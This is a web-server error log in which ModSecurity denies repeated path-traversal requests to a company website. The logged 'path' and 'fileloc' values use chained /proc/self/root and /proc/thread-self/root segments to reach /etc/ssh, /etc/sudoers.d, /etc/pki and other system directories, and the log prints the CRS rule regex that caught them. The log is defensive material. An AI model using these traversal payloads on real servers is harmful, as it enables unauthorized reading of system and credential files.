[Thu Mar 19 05:22:02.834942 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.243.128:53102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyKhkFeYa1D6dYQnDDAQAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:04.175692 2026] [mime_magic:error] [pid 14269:tid 140411708356352] (70014)End of file found: [client 74.7.243.128:53104] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/boot
[Thu Mar 19 05:22:04.669382 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.243.128:53110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyLAbLMZ6AikZjR9UxdQAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:06.334348 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:53126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyLuoXxyEfFpUF8f_kqwAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:08.503782 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:53134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyL-yqAr6etmhZHNo36gAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:11.239434 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:36706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyMwkwaGbbGflqUZCK3wAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:14.295169 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:36720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyNta6ubjKNq_cu4YXSQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:17.438274 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:36724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyN_u8EFLIOrSqIptzQwAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:19.140993 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:36730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyOwkwaGbbGflqUZCK6AAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:21.595380 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:35842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyPda6ubjKNq_cu4YXTQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:22.779671 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:35842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyPta6ubjKNq_cu4YXTgAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:24.348043 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.243.128:35852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyQAbLMZ6AikZjR9UxggAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:25.672869 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:35858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyQeoXxyEfFpUF8f_kwQAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:44.973557 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:35862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyVOyqAr6etmhZHNo4FAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:48.729784 2026] [mime_magic:error] [pid 17653:tid 140411649607424] (70014)End of file found: [client 57.141.18.29:44866] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:22:51.488392 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:54658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyW9a6ubjKNq_cu4YXYQAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:53.955115 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:58570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyXda6ubjKNq_cu4YXZAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:55.321485 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:58586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyX_u8EFLIOrSqIptzWQAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:22:57.886810 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:58598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyYeoXxyEfFpUF8f_k2gAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:23.523847 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.243.128:58602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyexkFeYa1D6dYQnDDLwAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:24.871350 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:33422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyfOyqAr6etmhZHNo4IgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:26.313515 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:33428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyfuyqAr6etmhZHNo4IwAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:27.595029 2026] [:error] [pid 14269:tid 140411540502272] [client 74.7.243.128:33444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuyfwbLMZ6AikZjR9UxoQAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:23:28.900324 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:33446] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuygOyqAr6etmhZHNo4JAAAAEA"], referer: 